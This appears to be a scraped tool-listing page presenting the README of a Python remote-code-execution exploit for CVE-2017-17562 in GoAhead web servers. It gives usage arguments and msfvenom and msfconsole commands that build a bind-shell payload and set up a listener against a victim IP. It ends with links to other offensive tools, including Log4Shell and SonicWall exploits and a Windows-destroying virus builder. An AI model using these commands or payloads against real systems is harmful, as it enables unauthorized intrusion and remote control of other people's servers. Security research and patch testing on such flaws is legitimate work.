Exploit for CVE-2017-17562 vulnerability, that allows RCE on GoAhead (< v3.6.5) if the CGI is enabled and a CGI program is dynamically linked.

Last update: Dec 12, 2021

Overview

GoAhead RCE Exploit

Exploit for CVE-2017-17562 vulnerability, that allows RCE on GoAhead (< v3.6.5) if the CGI is enabled and a CGI program is dynamically linked.

Usage

$ python3 cve-2017-17562-exploit.py [-h] --host HOST --port PORT --payload PAYLOAD [--ssl] [--cgi CGI]

Requirements

$ python3 -m pip install -r requirements.txt

Attention!

You need to generate the payload and set up the listening connection first.
Example:
(Attacker: 192.168.1.100 - Victim: 192.168.1.200)

$ msfvenom -a x64 --platform Linux -p generic/shell_bind_tcp LHOST=192.168.1.100 LPORT=1337 -f elf-so -o payload.so
$ msfconsole
msf6 > use multi/handler
msf6 exploit(multi/handler) > set payload generic/shell_bind_tcp
msf6 exploit(multi/handler) > set LPORT=1337
msf6 exploit(multi/handler) > set RHOST=192.168.1.200
msf6 exploit(multi/handler) > run
[*] Started bind TCP handler against 192.168.1.200:1337

Then, in another shell, you must run this exploit to send the payload that will start the reverse connection to the listener!

Arguments

Required arguments:
  --host HOST        Host running the GoAhead webserver.
  --port PORT        Port running the GoAhead webserver. Default: 80
  --payload PAYLOAD  Path to the payload.

Optional arguments:
  --ssl              Host is using SSL.
  --cgi LIST         Paths list to discover the CGI script on the GoAhead server. Default: paths.lst

Example

$ python3 exploit.py --host 192.168.1.200 --port 8080 --cgi custom_list.txt --payload payload.so --ssl

Exploit for CVE-2017-17562 vulnerability, that allows RCE on GoAhead (< v3.6.5) if the CGI is enabled and a CGI program is dynamically linked.

Related tags

Overview

GoAhead RCE Exploit

Usage

Requirements

Attention!

Arguments

Example

Owner

Francisco Spínola

A Docker based LDAP RCE exploit demo for CVE-2021-44228 Log4Shell

Virus-Builder - This tool will generate a virus that can only destroy Windows computer

A windows post exploitation tool that contains a lot of features for information gathering and more.

Hubble is a modular, open-source security compliance framework. The project provides on-demand profile-based auditing, real-time security event notifications, alerting, and reporting. HubbleStack is a free and open source project made possible by Adobe. https://github.com/adobe

Hikvision 流媒体管理服务器敏感信息泄漏

Kriecher is a simple Web Scanner which will run it's own checks for the OWASP

A secure password generator written in python

Oh365UserFinder is used for identifying valid o365 accounts without the risk of account lockouts.

Obfuscate ip address using different encodings

A fast tool to scan prototype pollution vulnerability

DNSSEQ: PowerDNS with FALCON Signature Scheme

WinRemoteEnum is a module-based collection of operations achievable by a low-privileged domain user.

Ethereum transaction decoder (community version).

Set the draft security HTTP header Permissions-Policy (previously Feature-Policy) on your Django app.

DirBruter is a Python based CLI tool. It looks for hidden or existing directories/files using brute force method. It basically works by launching a dictionary based attack against a webserver and analyse its response.

🔎 Most Advanced Open Source Intelligence (OSINT) Framework for scanning IP Address, Emails, Websites, Organizations.

Now patched 0day for force reseting an accounts password

Get related domains / subdomains by looking at Google Analytics IDs

SonicWall SMA-100 Unauth RCE Exploit (CVE-2021-20038)

Consolidating and extending hosts files from several well-curated sources. You can optionally pick extensions to block pornography, social media, and other categories.